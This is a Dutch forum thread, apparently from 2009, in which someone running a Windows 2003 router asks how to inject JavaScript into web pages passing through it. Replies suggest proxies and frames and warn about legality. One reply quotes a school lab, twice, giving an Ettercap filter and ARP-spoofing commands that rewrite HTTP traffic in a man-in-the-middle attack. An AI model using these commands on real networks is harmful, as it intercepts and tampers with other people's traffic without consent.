Win2003 'router' moet stuk javascr bij html pagina's toevoeg

Ik heb me een klein beetje verdiept in ARP spoofing op een ubuntu bak.
Daar was het mogelijk met ethercap/wireshark met templates HTML tags toe te voegen of te bewerken.
Aangezien je niet hoeft te ARP spoofen omdat je de gateway bent kan je misschien wel kijken of je het verkeer kan manipuleren.
Maar pas op waar je mee bezig bent want ik weet niet of dit legaal is.
Je kan der in iedergeval Imagetags mee bewerken.
Maar is het niet gewoon handiger als je een intranet page maakt.
Mensen vinden het denk ik niet fijn als hun sites worden bewerkt.
desnoods maak je een gateway pagina aan waarin ze moeten navigeren
dmv 2 frames oid bovenste is browsen en onderste in informatie.
Dan weet je zeker dat je niet illegaal bezig ben.

Ik denk dat Squid dat wel kan: http://wiki.squid-cache.org/SquidFaq/ContentAdaptation is een wiki pagina van Squid erover. Hoe stabiel Squid op Windows is tegenwoordig weet ik niet, maar je zou desnoods een FreeBSD of Linux machine kunnen draaien als een VMware Server guest ofzo?

Dit kan doormiddel van Ettercap

Stukje uit schoolpracticum netwerk securety:

Veranderen van data: website “defacing”
Het volgende voorbeeld demonstreert de “defacing” van een website.
· Voer op de MITM met een editor de file hhs.filter in:
if (ip.proto == TCP && tcp.src == 80) {
replace(" hogeschool", " kleuterschool");
replace(" Hogeschool", " Kleuterschool");
msg("Filter Match! \n");
}
(Let op de spatie tussen de eerste quote en hogeschool/kleutelschool)
· Compileer het filter en start Ettercap:
etterfilter hhs.filter –o hhs.ef
ettercap –TqF hhs.ef -M arp:remote /10.0.0.x,y/ /10.0.0.1/
Toelichting
- remote onderschept verkeer dat door de gateway gaat
- 10.0.0.x,y zijn de adressen van de beide clients
· Bezoek www.hhs.nl vanaf een browser op één van de clients en bekijk goed de site.
· Stop Ettercap en sluit de browsers

en dan: <html> laten vervangen door jou gedeelte

dit heet een Man In The Middle attack

Verwijderd schreef op vrijdag 13 februari 2009 @ 09:58:
Dit kan doormiddel van Ettercap

Stukje uit schoolpracticum netwerk securety:

Veranderen van data: website “defacing”
Het volgende voorbeeld demonstreert de “defacing” van een website.
· Voer op de MITM met een editor de file hhs.filter in:
if (ip.proto == TCP && tcp.src == 80) {
replace(" hogeschool", " kleuterschool");
replace(" Hogeschool", " Kleuterschool");
msg("Filter Match! \n");
}
(Let op de spatie tussen de eerste quote en hogeschool/kleutelschool)
· Compileer het filter en start Ettercap:
etterfilter hhs.filter –o hhs.ef
ettercap –TqF hhs.ef -M arp:remote /10.0.0.x,y/ /10.0.0.1/
Toelichting
- remote onderschept verkeer dat door de gateway gaat
- 10.0.0.x,y zijn de adressen van de beide clients
· Bezoek www.hhs.nl vanaf een browser op één van de clients en bekijk goed de site.
· Stop Ettercap en sluit de browsers

en dan: <html> laten vervangen door jou gedeelte

dit heet een Man In The Middle attack

Niet helemaal waar
Anders zien ze clients niks meer.
Gewoon de pagina in frames verdelen.
Dan geef je je bezoekers namelijk nog de mogelijkheid om het frame naar onder te slepen.